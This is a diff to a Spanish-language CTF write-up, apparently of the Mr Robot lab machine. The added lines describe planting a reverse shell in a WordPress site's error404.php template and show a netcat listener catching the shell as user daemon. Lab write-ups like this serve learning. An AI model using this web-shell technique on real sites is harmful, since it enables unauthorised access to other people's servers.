--- a/_posts/2021-11-01-MrRobot.md
+++ b/_posts/2021-11-01-MrRobot.md
@@ -157,5 +157,22 @@ luego de la espera, tenemos el usuario *Elliot* y la contraseña *ER28-0652*
 
 Miraremos la pagina de administración e inspeccinamos a ver que podemos hacer para obtener una *reverse shell*
 
-- algo curioso es que no tiene pagina por si se presenta un _error404_, crearemos la pagina e intentaremos obtener una _shell_ de 
-este modo
+- intentare usar la pagina de *error404.php* para ganar acceso desde mi maquina
+
+editamos el archivo _error404.php_ con nuestra *shell* y pongo mi maquina en escucha
+
+## Ganamos acceso
+
+```bash
+❯ nc -nlvp 1234
+listening on [any] 1234 ...
+connect to [10.9.50.132] from (UNKNOWN) [10.10.106.35] 46851
+Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+ 12:56:23 up 52 min,  0 users,  load average: 0.00, 0.01, 0.05
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+/bin/sh: 0: can't access tty; job control turned off
+```
+
+
+
